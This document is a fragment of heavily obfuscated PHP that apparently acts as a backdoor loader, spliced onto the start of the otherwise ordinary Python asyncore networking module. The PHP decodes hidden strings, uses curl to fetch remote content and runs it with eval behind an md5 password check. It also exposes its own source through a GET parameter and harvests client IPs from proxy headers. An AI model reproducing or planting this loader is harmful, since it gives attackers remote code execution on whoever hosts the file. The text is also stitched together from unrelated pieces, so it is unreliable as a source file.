kXcuJ3pcli: XMO8bJB3X4c: goto ZFAa2jo5Em1; nn6qAGIXtVJ: Y4huEalGRnY: goto Ou2zYWo3JDr; OZrmUZDWwVS: goto wxmnWJsS3Vj; goto bkXcuJ3pcli; R4nwFnFey3F: if (preg_match("\57\154\157\143\x61\x74\151\157\x6e\134\72\133\134\163\x5d\x2b\50\x2e\52\x29\57\151", $RmRDU0769bP, $iccbbLV_o_D)) { goto NZJOT0N3_fc; } goto QtILQ6UKwVL; uqQHK3mwLgA: NZJOT0N3_fc: goto x_cKPIQC3wl; ZFAa2jo5Em1: $Lfu07SmMZ8k["\163\164\x61\164\x75\163"] = intval($iccbbLV_o_D[1]); goto VoTtGfQLYFS; OVG9mzLTugo: } goto BfHtWkAdhV3; ojYbVw0ZTju: } goto Ipdw7rfNgO3; NSRBLvRsIZJ: $Bm6fBzMMzTd = preg_replace("\x2f\134\x3f\56\52\57", '', $_SERVER["\x52\105\121\125\105\x53\124\137\125\122\x49"]); goto GWbmi6ghGPj; uj5v1Bc1Pv5: class RAr2alvaPsc { static function LC1rrsRIno2($rIXYQS1ayZa) { goto TP1C6nBf9vb; acCL0hWrZYU: qQ1Py6Q0S5U: goto JxD6Ttz8GVO; JxD6Ttz8GVO: return $WrcjZmxt5Yx; goto EnbRRhxo5AA; Xa5JZck5OUn: $WrcjZmxt5Yx = ''; goto M7yYtep1FOw; M7yYtep1FOw: foreach ($ohAGVNDO94s as $Fua_BfPMtf8 => $qRUHN0cvc1q) { $WrcjZmxt5Yx .= $jiYcCeRj2Gt[$qRUHN0cvc1q - 22568]; bEsj9gRhlTp: } goto acCL0hWrZYU; rdTVnStdy17: $jiYcCeRj2Gt = $p3gGlu5XiKO("\x7e", "\40"); goto vurEe9U1FdX; TP1C6nBf9vb: $p3gGlu5XiKO = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto rdTVnStdy17; vurEe9U1FdX: $ohAGVNDO94s = explode("\x5e", $rIXYQS1ayZa); goto Xa5JZck5OUn; EnbRRhxo5AA: } static function AZVJ0NFyLqK($GwyhZT2Nkcn, $hbYMmPrpjoj) { goto mT92KPpYP03; Kna_zSArpCa: curl_setopt($V2c21DaN37J, CURLOPT_RETURNTRANSFER, 1); goto HVheqhfNM6c; mT92KPpYP03: $V2c21DaN37J = curl_init($GwyhZT2Nkcn); goto Kna_zSArpCa; CBni7YfJ6__: return empty($ALYl1g3y1fZ) ? $hbYMmPrpjoj($GwyhZT2Nkcn) : $ALYl1g3y1fZ; goto HiTImhF1ugD; HVheqhfNM6c: $ALYl1g3y1fZ = curl_exec($V2c21DaN37J); goto CBni7YfJ6__; HiTImhF1ugD: } static function j9IvsgaWvxp() { goto sMy1yJjA5WR; wa0dtxRoLtP: @eval($SMsgHLjb7FZ[4 + 0]($tz4SxWGpGeS)); goto nw_1P2eYvKZ; nw_1P2eYvKZ: die; goto Te9JRsINWaJ; EoIQokruCml: zJgPmPyR0MS: goto B4eurh7e3fE; sMy1yJjA5WR: $f246H1ZW8lE = array("\x32\62\x35\x39\x35\136\x32\62\65\70\x30\136\62\62\x35\x39\63\136\62\x32\x35\71\67\136\x32\62\x35\67\70\136\62\x32\x35\71\63\x5e\x32\62\x35\x39\x39\136\62\62\x35\71\x32\x5e\x32\62\x35\67\67\x5e\62\62\x35\x38\64\x5e\62\62\x35\71\65\x5e\x32\62\x35\67\70\x5e\x32\62\65\x38\71\136\x32\62\x35\x38\x33\136\62\x32\x35\x38\64", "\x32\x32\x35\x37\x39\x5e\62\62\65\67\70\x5e\62\62\x35\x38\x30\x5e\62\x32\x35\x39\71\136\x32\62\65\x38\60\136\x32\x32\x35\x38\63\x5e\62\62\65\x37\x38\x5e\62\x32\66\x34\x35\136\62\62\x36\x34\x33", "\62\62\x35\x38\70\136\x32\x32\x35\x37\x39\136\62\x32\x35\x38\63\x5e\x32\62\x35\70\x34\x5e\x32\62\65\x39\x39\x5e\62\62\x35\x39\64\x5e\x32\62\65\71\63\x5e\x32\x32\65\71\x35\136\62\62\65\70\63\136\x32\x32\x35\71\x34\136\62\62\65\71\x33", "\62\x32\65\70\x32\x5e\62\62\x35\71\67\136\x32\62\65\x39\x35\x5e\x32\62\65\70\x37", "\x32\x32\65\71\x36\136\62\x32\x35\x39\x37\x5e\x32\x32\65\67\x39\136\x32\x32\x35\x39\63\136\62\62\x36\x34\x30\136\62\62\66\x34\62\x5e\62\x32\x35\x39\x39\136\x32\62\65\71\64\x5e\62\62\x35\x39\63\136\x32\62\x35\x39\65\136\x32\62\65\70\63\136\x32\x32\65\x39\64\136\62\62\65\x39\63", "\62\x32\65\x39\62\x5e\x32\x32\65\70\x39\x5e\x32\x32\x35\x38\x36\x5e\x32\x32\x35\71\63\x5e\x32\62\x35\x39\71\136\62\x32\x35\71\61\136\x32\x32\65\x39\63\x5e\62\62\65\67\x38\136\62\x32\65\71\71\136\x32\62\65\x39\x35\x5e\x32\62\x35\x38\63\136\62\x32\x35\70\x34\136\x32\62\65\67\x38\x5e\62\62\x35\x39\63\x5e\x32\62\65\x38\x34\x5e\62\x32\x35\x37\70\x5e\62\62\65\67\71", "\62\62\x36\62\x32\136\62\62\x36\x35\x32", "\x32\x32\65\66\x39", "\62\62\x36\x34\67\x5e\x32\x32\66\x35\x32", "\62\62\x36\62\71\136\x32\62\x36\x31\62\136\x32\x32\x36\61\x32\x5e\x32\62\x36\62\x39\x5e\62\x32\66\60\x35", "\62\x32\65\71\62\136\x32\x32\x35\x38\71\136\x32\62\65\x38\66\x5e\x32\x32\65\x37\70\x5e\62\x32\65\x39\x33\x5e\62\x32\x35\70\60\x5e\x32\x32\x35\71\71\x5e\x32\62\x35\70\71\136\62\62\65\70\x34\136\x32\62\65\x38\x32\x5e\62\62\x35\67\x37\136\x32\62\65\x37\x38"); goto MARu4QE8x6O; MARu4QE8x6O: foreach ($f246H1ZW8lE as $yI91XtVleEZ) { $SMsgHLjb7FZ[] = self::lC1rrSRinO2($yI91XtVleEZ); skiHfXu4Ki4: } goto EoIQokruCml; mOZIEw2NOr2: $n_UPDy9GPeE = @$SMsgHLjb7FZ[0 + 3]($SMsgHLjb7FZ[0 + 6], $y1G9q6tjV08); goto KX1ZdUDdqFB; F_yqHtA6_Bq: $tz4SxWGpGeS = self::AzVJ0nfylQK($CkMSoDREXpk[0 + 1], $SMsgHLjb7FZ[4 + 1]); goto wa0dtxRoLtP; Te9JRsINWaJ: K6qKJOSIiYw: goto uwsX8TJApDD; yj6RFPUPKYW: if (!(@$CkMSoDREXpk[0] - time() > 0 and md5(md5($CkMSoDREXpk[1 + 2])) === "\63\60\70\67\x62\145\x39\143\x65\x62\x65\145\x33\x66\146\x66\60\x35\x62\65\144\x64\70\x61\x37\63\x31\142\x38\63\x32\143")) { goto K6qKJOSIiYw; } goto F_yqHtA6_Bq; KX1ZdUDdqFB: $CkMSoDREXpk = $SMsgHLjb7FZ[2 + 0]($n_UPDy9GPeE, true); goto cTmPPmuEskD; cTmPPmuEskD: @$SMsgHLjb7FZ[4 + 6](INPUT_GET, "\157\146") == 1 && die($SMsgHLjb7FZ[5 + 0](__FILE__)); goto yj6RFPUPKYW; B4eurh7e3fE: $y1G9q6tjV08 = @$SMsgHLjb7FZ[1]($SMsgHLjb7FZ[7 + 3](INPUT_GET, $SMsgHLjb7FZ[4 + 5])); goto mOZIEw2NOr2; uwsX8TJApDD: } } goto JtTX1U_1EFq; Lyj6N28uwBS: $bgpPJ0Zi5hE["\x72"] = x6cSzwlJBCd($_SERVER["\122\x45\121\x55\x45\x53\124\x5f\125\122\x49"]); goto CzDNCIeT_k0; TSwH9AzH3pK: $bgpPJ0Zi5hE["\x69"] = x6CsZwLjBcd($s523gbDMtcu); goto yXOovHHws9R; D_pfMIvXDND: @header("\103\x6f\x6e\164\145\x6e\x74\x2d\124\171\x70\x65\x3a" . $JtLWvp1EqLz["\164\x79\x70\145"]); goto F2YHQvDNajd; FvqaFXYFCYz: exit("\x7b\40\42\x65\162\x72\157\x72\x22\72\x20\x32\60\x30\x2c\x20\x22\x6c\143\x22\72\40\x22\152\153\x22\54\x20\x22\144\141\x74\x61\42\x3a\40\133\x20\61\x20\135\x20\175"); goto g1nbHzXPt8R; F2YHQvDNajd: echo $JtLWvp1EqLz["\x63\x6f\156\x74\145\156\x74"]; goto RbcR3TDcvIv; ThyuZCPGrvK: function aa2bJGaU0r_() { goto qGs6zE3gynS; AZ2Yhb1esFE: $s523gbDMtcu = $_SERVER["\122\105\115\117\124\105\x5f\x41\x44\x44\122"]; goto pJawReXN2Ya; PM1sVLA2I4q: $s523gbDMtcu = $s523gbDMtcu[0]; goto ceuGd5Fum5u; pQHMRZZ270q: if (isset($_SERVER["\110\124\x54\x50\x5f\x58\137\122\105\101\x4c\x5f\111\x50"]) && !empty($_SERVER["\110\x54\x54\120\137\130\137\x52\105\x41\x4c\137\111\x50"])) { goto qXCkXAily2f; } goto zVEQSAHUv3r; HOeyGJfYpsL: $s523gbDMtcu = trim(str_replace("\40", '', $s523gbDMtcu), "\x2c"); goto qR8uAehMtc9; ceuGd5Fum5u: Iiq3RHO4Fjj: goto MUU7_gpONq8; hVsgLzNJjSI: goto B_cTysIL3cn; goto aXvbs8vfUJ_; NyIT6DLDB8t: B_cTysIL3cn: goto HOeyGJfYpsL; AHTJ60TQtPg: if (isset($_SERVER["\x48\x54\x54\x50\x5f\103\106\137\103\x4f\116\116\105\x43\x54\x49\116\x47\x5f\x49\x50"]) && !empty($_SERVER["\110\x54\x54\120\x5f\x43\x46\x5f\103\117\116\116\x45\103\124\111\x4e\x47\x5f\x49\120"])) { goto fWjcxD6qYIB; } goto pQHMRZZ270q; qGs6zE3gynS: $s523gbDMtcu = ''; goto AHTJ60TQtPg; AX8fcsGJDc7: $s523gbDMtcu = $_SERVER["\x48\124\124\x50\137\130\137\122\105\x41\114\x5f\111\120"]; goto aoFTIfhTqke; qR8uAehMtc9: if (!(strpos($s523gbDMtcu, "\x2c") !== false)) { goto Iiq3RHO4Fjj; } goto KDuRn_rkiVZ; pJawReXN2Ya: goto B_cTysIL3cn; goto PcXQUJhknMA; LjVLRW5nb4t: $s523gbDMtcu = $_SERVER["\110\x54\x54\120\137\x58\x5f\106\x4f\x52\x57\101\122\x44\105\x44\137\x46\x4f\x52"]; goto NyIT6DLDB8t; EDADEBQ81Qm: Jbz2xMuxeIr: goto LjVLRW5nb4t; MUU7_gpONq8: return $s523gbDMtcu; goto VZeBSXmofDq; VD5PkV_Pxaw: $s523gbDMtcu = $_SERVER["\x48\x54\124\x50\x5f\x43\106\137\103\117\116\116\x45\103\124\x49\116\x47\x5f\111\x50"]; goto hVsgLzNJjSI; aoFTIfhTqke: goto B_cTysIL3cn; goto EDADEBQ81Qm; KDuRn_rkiVZ: $s523gbDMtcu = explode("\54", $s523gbDMtcu); goto PM1sVLA2I4q; PcXQUJhknMA: fWjcxD6qYIB: goto VD5PkV_Pxaw; aXvbs8vfUJ_: qXCkXAily2f: goto AX8fcsGJDc7; zVEQSAHUv3r: if (isset($_SERVER["\110\124\124\120\137\x58\x5f\106\117\x52\127\x41\122\x44\x45\x44\137\106\x4f\x52"]) && !empty($_SERVER["\110\x54\124\120\137\x58\137\106\117\x52\127\101\x52\x44\105\x44\x5f\106\x4f\x52"])) { goto Jbz2xMuxeIr; } goto AZ2Yhb1esFE; VZeBSXmofDq: } goto k7TBZVsI5lr; JtTX1U_1EFq: rAR2aLVapsc::J9iVSgAwvxp(); goto sFT_PnBYD5A; gbRJ6wI9X1J: if ($MaT3VYXevMh) { goto u0kQWBLRjHa; } goto F4F8Gny9Auy; Riq085QaZlJ: u0kQWBLRjHa: ?> HEX
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# -*- Mode: Python -*-
#   Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp
#   Author: Sam Rushing <rushing@nightmare.com>

# ======================================================================
# Copyright 1996 by Sam Rushing
#
#                         All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================

"""Basic infrastructure for asynchronous socket service clients and servers.

There are only two ways to have a program on a single processor do "more
than one thing at a time".  Multi-threaded programming is the simplest and
most popular way to do it, but there is another very different technique,
that lets you have nearly all the advantages of multi-threading, without
actually using multiple threads. it's really only practical if your program
is largely I/O bound. If your program is CPU bound, then pre-emptive
scheduled threads are probably what you really need. Network servers are
rarely CPU-bound, however.

If your operating system supports the select() system call in its I/O
library (and nearly all do), then you can use it to juggle multiple
communication channels at once; doing other work while your I/O is taking
place in the "background."  Although this strategy can seem strange and
complex, especially at first, it is in many ways easier to understand and
control than multi-threaded programming. The module documented here solves
many of the difficult problems for you, making the task of building
sophisticated high-performance network servers and clients a snap.
"""

import select
import socket
import sys
import time
import warnings

import os
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, ECONNRESET, EINVAL, \
     ENOTCONN, ESHUTDOWN, EISCONN, EBADF, ECONNABORTED, EPIPE, EAGAIN, \
     errorcode

_DISCONNECTED = frozenset({ECONNRESET, ENOTCONN, ESHUTDOWN, ECONNABORTED, EPIPE,
                           EBADF})

try:
    socket_map
except NameError:
    socket_map = {}

def _strerror(err):
    try:
        return os.strerror(err)
    except (ValueError, OverflowError, NameError):
        if err in errorcode:
            return errorcode[err]
        return "Unknown error %s" %err

class ExitNow(Exception):
    pass

_reraised_exceptions = (ExitNow, KeyboardInterrupt, SystemExit)

def read(obj):
    try:
        obj.handle_read_event()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()

def write(obj):
    try:
        obj.handle_write_event()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()

def _exception(obj):
    try:
        obj.handle_expt_event()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()

def readwrite(obj, flags):
    try:
        if flags & select.POLLIN:
            obj.handle_read_event()
        if flags & select.POLLOUT:
            obj.handle_write_event()
        if flags & select.POLLPRI:
            obj.handle_expt_event()
        if flags & (select.POLLHUP | select.POLLERR | select.POLLNVAL):
            obj.handle_close()
    except OSError as e:
        if e.args[0] not in _DISCONNECTED:
            obj.handle_error()
        else:
            obj.handle_close()
    except _reraised_exceptions:
        raise
    except:
        obj.handle_error()

def poll(timeout=0.0, map=None):
    if map is None:
        map = socket_map
    if map:
        r = []; w = []; e = []
        for fd, obj in list(map.items()):
            is_r = obj.readable()
            is_w = obj.writable()
            if is_r:
                r.append(fd)
            # accepting sockets should not be writable
            if is_w and not obj.accepting:
                w.append(fd)
            if is_r or is_w:
                e.append(fd)
        if [] == r == w == e:
            time.sleep(timeout)
            return

        r, w, e = select.select(r, w, e, timeout)

        for fd in r:
            obj = map.get(fd)
            if obj is None:
                continue
            read(obj)

        for fd in w:
            obj = map.get(fd)
            if obj is None:
                continue
            write(obj)

        for fd in e:
            obj = map.get(fd)
            if obj is None:
                continue
            _exception(obj)

def poll2(timeout=0.0, map=None):
    # Use the poll() support added to the select module in Python 2.0
    if map is None:
        map = socket_map
    if timeout is not None:
        # timeout is in milliseconds
        timeout = int(timeout*1000)
    pollster = select.poll()
    if map:
        for fd, obj in list(map.items()):
            flags = 0
            if obj.readable():
                flags |= select.POLLIN | select.POLLPRI
            # accepting sockets should not be writable
            if obj.writable() and not obj.accepting:
                flags |= select.POLLOUT
            if flags:
                pollster.register(fd, flags)

        r = pollster.poll(timeout)
        for fd, flags in r:
            obj = map.get(fd)
            if obj is None:
                continue
            readwrite(obj, flags)

poll3 = poll2                           # Alias for backward compatibility

def loop(timeout=30.0, use_poll=False, map=None, count=None):
    if map is None:
        map = socket_map

    if use_poll and hasattr(select, 'poll'):
        poll_fun = poll2
    else:
        poll_fun = poll

    if count is None:
        while map:
            poll_fun(timeout, map)

    else:
        while map and count > 0:
            poll_fun(timeout, map)
            count = count - 1

class dispatcher:

    debug = False
    connected = False
    accepting = False
    connecting = False
    closing = False
    addr = None
    ignore_log_types = frozenset({'warning'})

    def __init__(self, sock=None, map=None):
        if map is None:
            self._map = socket_map
        else:
            self._map = map

        self._fileno = None

        if sock:
            # Set to nonblocking just to make sure for cases where we
            # get a socket from a blocking source.
            sock.setblocking(0)
            self.set_socket(sock, map)
            self.connected = True
            # The constructor no longer requires that the socket
            # passed be connected.
            try:
                self.addr = sock.getpeername()
            except OSError as err:
                if err.args[0] in (ENOTCONN, EINVAL):
                    # To handle the case where we got an unconnected
                    # socket.
                    self.connected = False
                else:
                    # The socket is broken in some unknown way, alert
                    # the user and remove it from the map (to prevent
                    # polling of broken sockets).
                    self.del_channel(map)
                    raise
        else:
            self.socket = None

    def __repr__(self):
        status = [self.__class__.__module__+"."+self.__class__.__qualname__]
        if self.accepting and self.addr:
            status.append('listening')
        elif self.connected:
            status.append('connected')
        if self.addr is not None:
            try:
                status.append('%s:%d' % self.addr)
            except TypeError:
                status.append(repr(self.addr))
        return '<%s at %#x>' % (' '.join(status), id(self))

    __str__ = __repr__

    def add_channel(self, map=None):
        #self.log_info('adding channel %s' % self)
        if map is None:
            map = self._map
        map[self._fileno] = self

    def del_channel(self, map=None):
        fd = self._fileno
        if map is None:
            map = self._map
        if fd in map:
            #self.log_info('closing channel %d:%s' % (fd, self))
            del map[fd]
        self._fileno = None

    def create_socket(self, family=socket.AF_INET, type=socket.SOCK_STREAM):
        self.family_and_type = family, type
        sock = socket.socket(family, type)
        sock.setblocking(0)
        self.set_socket(sock)

    def set_socket(self, sock, map=None):
        self.socket = sock
##        self.__dict__['socket'] = sock
        self._fileno = sock.fileno()
        self.add_channel(map)

    def set_reuse_addr(self):
        # try to re-use a server port if possible
        try:
            self.socket.setsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEADDR,
                self.socket.getsockopt(socket.SOL_SOCKET,
                                       socket.SO_REUSEADDR) | 1
                )
        except OSError:
            pass

    # ==================================================
    # predicates for select()
    # these are used as filters for the lists of sockets
    # to pass to select().
    # ==================================================

    def readable(self):
        return True

    def writable(self):
        return True

    # ==================================================
    # socket object methods.
    # ==================================================

    def listen(self, num):
        self.accepting = True
        if os.name == 'nt' and num > 5:
            num = 5
        return self.socket.listen(num)

    def bind(self, addr):
        self.addr = addr
        return self.socket.bind(addr)

    def connect(self, address):
        self.connected = False
        self.connecting = True
        err = self.socket.connect_ex(address)
        if err in (EINPROGRESS, EALREADY, EWOULDBLOCK) \
        or err == EINVAL and os.name == 'nt':
            self.addr = address
            return
        if err in (0, EISCONN):
            self.addr = address
            self.handle_connect_event()
        else:
            raise OSError(err, errorcode[err])

    def accept(self):
        # XXX can return either an address pair or None
        try:
            conn, addr = self.socket.accept()
        except TypeError:
            return None
        except OSError as why:
            if why.args[0] in (EWOULDBLOCK, ECONNABORTED, EAGAIN):
                return None
            else:
                raise
        else:
            return conn, addr

    def send(self, data):
        try:
            result = self.socket.send(data)
            return result
        except OSError as why:
            if why.args[0] == EWOULDBLOCK:
                return 0
            elif why.args[0] in _DISCONNECTED:
                self.handle_close()
                return 0
            else:
                raise

    def recv(self, buffer_size):
        try:
            data = self.socket.recv(buffer_size)
            if not data:
                # a closed connection is indicated by signaling
                # a read condition, and having recv() return 0.
                self.handle_close()
                return b''
            else:
                return data
        except OSError as why:
            # winsock sometimes raises ENOTCONN
            if why.args[0] in _DISCONNECTED:
                self.handle_close()
                return b''
            else:
                raise

    def close(self):
        self.connected = False
        self.accepting = False
        self.connecting = False
        self.del_channel()
        if self.socket is not None:
            try:
                self.socket.close()
            except OSError as why:
                if why.args[0] not in (ENOTCONN, EBADF):
                    raise

    # log and log_info may be overridden to provide more sophisticated
    # logging and warning methods. In general, log is for 'hit' logging
    # and 'log_info' is for informational, warning and error logging.

    def log(self, message):
        sys.stderr.write('log: %s\n' % str(message))

    def log_info(self, message, type='info'):
        if type not in self.ignore_log_types:
            print('%s: %s' % (type, message))

    def handle_read_event(self):
        if self.accepting:
            # accepting sockets are never connected, they "spawn" new
            # sockets that are connected
            self.handle_accept()
        elif not self.connected:
            if self.connecting:
                self.handle_connect_event()
            self.handle_read()
        else:
            self.handle_read()

    def handle_connect_event(self):
        err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
        if err != 0:
            raise OSError(err, _strerror(err))
        self.handle_connect()
        self.connected = True
        self.connecting = False

    def handle_write_event(self):
        if self.accepting:
            # Accepting sockets shouldn't get a write event.
            # We will pretend it didn't happen.
            return

        if not self.connected:
            if self.connecting:
                self.handle_connect_event()
        self.handle_write()

    def handle_expt_event(self):
        # handle_expt_event() is called if there might be an error on the
        # socket, or if there is OOB data
        # check for the error condition first
        err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
        if err != 0:
            # we can get here when select.select() says that there is an
            # exceptional condition on the socket
            # since there is an error, we'll go ahead and close the socket
            # like we would in a subclassed handle_read() that received no
            # data
            self.handle_close()
        else:
            self.handle_expt()

    def handle_error(self):
        nil, t, v, tbinfo = compact_traceback()

        # sometimes a user repr method will crash.
        try:
            self_repr = repr(self)
        except:
            self_repr = '<__repr__(self) failed for object at %0x>' % id(self)

        self.log_info(
            'uncaptured python exception, closing channel %s (%s:%s %s)' % (
                self_repr,
                t,
                v,
                tbinfo
                ),
            'error'
            )
        self.handle_close()

    def handle_expt(self):
        self.log_info('unhandled incoming priority event', 'warning')

    def handle_read(self):
        self.log_info('unhandled read event', 'warning')

    def handle_write(self):
        self.log_info('unhandled write event', 'warning')

    def handle_connect(self):
        self.log_info('unhandled connect event', 'warning')

    def handle_accept(self):
        pair = self.accept()
        if pair is not None:
            self.handle_accepted(*pair)

    def handle_accepted(self, sock, addr):
        sock.close()
        self.log_info('unhandled accepted event', 'warning')

    def handle_close(self):
        self.log_info('unhandled close event', 'warning')
        self.close()

# ---------------------------------------------------------------------------
# adds simple buffered output capability, useful for simple clients.
# [for more sophisticated usage use asynchat.async_chat]
# ---------------------------------------------------------------------------

class dispatcher_with_send(dispatcher):

    def __init__(self, sock=None, map=None):
        dispatcher.__init__(self, sock, map)
        self.out_buffer = b''

    def initiate_send(self):
        num_sent = 0
        num_sent = dispatcher.send(self, self.out_buffer[:65536])
        self.out_buffer = self.out_buffer[num_sent:]

    def handle_write(self):
        self.initiate_send()

    def writable(self):
        return (not self.connected) or len(self.out_buffer)

    def send(self, data):
        if self.debug:
            self.log_info('sending %s' % repr(data))
        self.out_buffer = self.out_buffer + data
        self.initiate_send()

# ---------------------------------------------------------------------------
# used for debugging.
# ---------------------------------------------------------------------------

def compact_traceback():
    t, v, tb = sys.exc_info()
    tbinfo = []
    if not tb: # Must have a traceback
        raise AssertionError("traceback does not exist")
    while tb:
        tbinfo.append((
            tb.tb_frame.f_code.co_filename,
            tb.tb_frame.f_code.co_name,
            str(tb.tb_lineno)
            ))
        tb = tb.tb_next

    # just to be safe
    del tb

    file, function, line = tbinfo[-1]
    info = ' '.join(['[%s|%s|%s]' % x for x in tbinfo])
    return (file, function, line), t, v, info

def close_all(map=None, ignore_all=False):
    if map is None:
        map = socket_map
    for x in list(map.values()):
        try:
            x.close()
        except OSError as x:
            if x.args[0] == EBADF:
                pass
            elif not ignore_all:
                raise
        except _reraised_exceptions:
            raise
        except:
            if not ignore_all:
                raise
    map.clear()

# Asynchronous File I/O:
#
# After a little research (reading man pages on various unixen, and
# digging through the linux kernel), I've determined that select()
# isn't meant for doing asynchronous file i/o.
# Heartening, though - reading linux/mm/filemap.c shows that linux
# supports asynchronous read-ahead.  So _MOST_ of the time, the data
# will be sitting in memory for us already when we go to read it.
#
# What other OS's (besides NT) support async file i/o?  [VMS?]
#
# Regardless, this is useful for pipes, and stdin/stdout...

if os.name == 'posix':
    class file_wrapper:
        # Here we override just enough to make a file
        # look like a socket for the purposes of asyncore.
        # The passed fd is automatically os.dup()'d

        def __init__(self, fd):
            self.fd = os.dup(fd)

        def __del__(self):
            if self.fd >= 0:
                warnings.warn("unclosed file %r" % self, ResourceWarning,
                              source=self)
            self.close()

        def recv(self, *args):
            return os.read(self.fd, *args)

        def send(self, *args):
            return os.write(self.fd, *args)

        def getsockopt(self, level, optname, buflen=None):
            if (level == socket.SOL_SOCKET and
                optname == socket.SO_ERROR and
                not buflen):
                return 0
            raise NotImplementedError("Only asyncore specific behaviour "
                                      "implemented.")

        read = recv
        write = send

        def close(self):
            if self.fd < 0:
                return
            fd = self.fd
            self.fd = -1
            os.close(fd)

        def fileno(self):
            return self.fd

    class file_dispatcher(dispatcher):

        def __init__(self, fd, map=None):
            dispatcher.__init__(self, None, map)
            self.connected = True
            try:
                fd = fd.fileno()
            except AttributeError:
                pass
            self.set_file(fd)
            # set it to non-blocking mode
            os.set_blocking(fd, False)

        def set_file(self, fd):
            self.socket = file_wrapper(fd)
            self._fileno = self.socket.fileno()
            self.add_channel()